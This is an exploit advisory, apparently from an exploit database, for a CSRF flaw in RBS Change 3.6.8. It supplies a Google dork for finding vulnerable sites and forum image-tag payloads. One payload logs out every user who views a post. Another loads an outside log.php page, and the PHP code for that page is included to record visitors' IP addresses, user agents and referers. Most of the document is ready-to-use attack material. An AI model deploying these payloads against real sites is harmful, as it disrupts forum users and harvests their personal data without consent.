# Exploit Title: RBS Change Complet Open Source CSRF # Google Dork: intext:"une r&#195;&#169;alisation rbs" # Date: 10/01/2014 # Exploit Author: KrustyHack # Vendor Homepage: http://www.rbschange.fr/ # Software Link: http://www.rbschange.fr/addons/distributions/RBS-Change-complet-Open-Source,67203.html # Version: 3.6.8 # Tested on: Linux HOW TO ====== Just add [img="http://CSRF"][/img] on forum signature or forum posts. TEST ==== Based on demo.rbschange.fr: --------------------------- [img="http://server/fr/deconnexion/"][/img] Will disconnect all users who load the image. Other example: -------------- [img="http://www.example.com/log.php"][/img] <?php $ip = $_SERVER['REMOTE_ADDR']; $ip_proxy = $_SERVER['HTTP_X_FORWARDED_FOR']; $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; file_put_contents("log.txt", "[".date('l jS \of F Y h:i:s A')."] [$ip_proxy]$ip - $rem_port - $user_agent - $rqst_method - $rem_host - $referer\n", FILE_APPEND); ?> To get users ip, user agent, ...